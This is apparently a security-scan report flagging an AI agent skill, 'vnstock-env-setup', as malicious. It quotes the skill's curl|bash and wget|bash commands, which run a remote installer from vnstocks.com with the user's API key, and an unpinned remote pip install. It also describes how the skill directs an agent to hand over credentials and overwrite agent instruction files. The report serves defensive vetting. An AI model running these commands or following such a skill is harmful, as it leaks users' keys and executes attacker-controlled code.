vnstock-env-setup Security Report — Malicious | ClawSafe

92 /100

vnstock-env-setup

Comprehensive environment diagnostic, setup, and agent guide installation for the Vnstock ecosystem

Confirmed malicious: credential theft combined with curl|bash remote code execution allows arbitrary code injection at any time.

Skill Namevnstock-env-setup

Duration48.2s

Enginepi

⛔

Do not install this skill

DO NOT USE. This skill exfiltrates API keys to vnstocks.com and executes arbitrary remote code via curl|bash pattern. Immediate uninstallation recommended.

Attack Chain 5 steps

◎

Entry Skill presents as legitimate 'Vnstock Environment Setup' tool

SKILL.md:1

⬡

Escalation User provides Sponsor-tier API key during setup

SKILL.md:129

⬡

Escalation API key transmitted to external server via --api-key parameter

SKILL.md:129

⬡

Escalation Remote script downloaded and piped to bash for execution

SKILL.md:132

◉

Impact Attacker can modify vnstock-cli-installer.run at any time to inject arbitrary code with user privileges

SKILL.md:132

Findings 6 items

Severity	Finding	Location
Critical	API keys sent to external server vnstocks.com Credential Theft The skill instructs the AI to accept user API keys and pass them to the remotely-fetched installer script at https://vnstocks.com/files/vnstock-cli-installer.run via --api-key parameter. This means all sponsor-tier API keys are transmitted to an external server. `wget -qO- https://vnstocks.com/files/vnstock-cli-installer.run \| bash -s -- --non-interactive --api-key "USER_API_KEY"` → Never pass credentials to externally-hosted scripts. Use official PyPI packages with verified hashes instead.	`SKILL.md:129`
Critical	curl\|bash remote code execution pattern RCE SKILL.md instructs execution of 'curl URL \| bash' which downloads and executes arbitrary code from vnstocks.com. The server can modify the response at any time to inject malicious code, creating a persistent backdoor. `curl -fsSL https://vnstocks.com/files/vnstock-cli-installer.run \| bash -s -- --non-interactive --api-key "USER_API_KEY"` → Never use curl\|bash patterns. Download scripts first, inspect source, verify hashes, then execute locally.	`SKILL.md:132`
Critical	Unverified external requirements.txt Supply Chain pip install -r https://vnstocks.com/files/requirements.txt downloads dependencies from an external URL with no version pinning, hash verification, or integrity checks. The remote file can be modified at any time. `pip install -r https://vnstocks.com/files/requirements.txt` → Use only PyPI-hosted packages with pinned versions and hash verification.	`SKILL.md:30`
High	Undeclared credential transmission Doc Mismatch SKILL.md describes this as a 'diagnostics and setup' skill but never discloses that user API keys are transmitted to vnstocks.com. The documentation only mentions 'API key' in the install command context. `description: Comprehensive environment diagnostic, setup, and agent guide installation` → All credential transmissions must be explicitly documented with clear warnings.	`SKILL.md:1`
High	Filesystem overwrite without proper confirmation Sensitive Access setup_agent_guide.py overwrites AGENTS.md, CLAUDE.md, entire docs/ directory, and copies/deletes skills directories. Git config is modified with hardcoded email '[email protected]'. `shutil.copy2(src, os.path.join(cwd, file))` → Document all filesystem modifications. Require explicit user consent for overwriting user files.	`scripts/setup_agent_guide.py:67`
Medium	Attempts to install git with elevated privileges Priv Escalation check_and_install_git() attempts 'sudo apt-get install -y git' on Linux and downloads/runs an installer executable on Windows. `run_cmd(["sudo", "apt-get", "install", "-y", "git"])` → Document elevated permission requirements. Prefer user-managed installations over automated sudo.	`scripts/setup_agent_guide.py:30`

Resource	Declared	Inferred	Status	Evidence
Shell	`NONE`	`WRITE`	✗ Violation	SKILL.md:32 curl\|bash pattern
Network	`NONE`	`WRITE`	✗ Violation	SKILL.md:32 POSTs API key to vnstocks.com
Filesystem	`NONE`	`WRITE`	✗ Violation	setup_agent_guide.py:67-91 shutil.copytree/rmtree
Environment	`NONE`	`READ`	✗ Violation	diagnostics.py:16 checks VIRTUAL_ENV, CONDA_PREFIX

4 Critical 9 findings

💀

Critical Dangerous Command 危险 Shell 命令

wget -qO- https://vnstocks.com/files/vnstock-cli-installer.run \| bash

SKILL.md:32

💀

Critical Dangerous Command 危险 Shell 命令

curl -fsSL https://vnstocks.com/files/vnstock-cli-installer.run \| bash

SKILL.md:32

💀

Critical Dangerous Command 危险 Shell 命令

wget -qO- https://vnstocks.com/files/vnstock-cli-installer.run | bash

SKILL.md:129

💀

Critical Dangerous Command 危险 Shell 命令

curl -fsSL https://vnstocks.com/files/vnstock-cli-installer.run | bash

SKILL.md:132

🔗

Medium External URL 外部 URL

https://vnstocks.com/files/requirements.txt

SKILL.md:30

🔗

Medium External URL 外部 URL

https://vnstocks.com/files/vnstock-cli-installer.run

SKILL.md:32

🔗

Medium External URL 外部 URL

https://vnstocks.com/files/requirements.txt;

SKILL.md:32

🔗

Medium External URL 外部 URL

https://vnstocks.com/api/simple

SKILL.md:32

📧

Info Email 邮箱地址

[email protected]

scripts/setup_agent_guide.py:44

File Tree

3 files · 15.2 KB · 324 lines

Python 2f · 173L Markdown 1f · 151L

├─ ▾ 📁 scripts

│ ├─ 🐍 diagnostics.py Python 54L · 1.9 KB

│ └─ 🐍 setup_agent_guide.py Python 119L · 5.2 KB

└─ 📝 SKILL.md Markdown 151L · 8.1 KB

Dependencies 2 items

Package	Version	Source	Known Vulns	Notes
`vnstocks.com/files/requirements.txt`	`*`	external URL	Yes	No version pinning, no hash verification, fetched from external server
`vnstock-cli-installer.run`	`unknown`	external URL	Yes	Remote script piped to bash - can be modified at any time to inject malicious code

Security Positives

✓ Uses virtual environment as documented best practice

✓ Provides diagnostic checks before making changes

✓ Checks for git backup before installation

✓ Asks user permission before overwriting docs/ directory

Scan Report

Attack Chain 5 steps

Findings 6 items

File Tree

Dependencies 2 items

Security Positives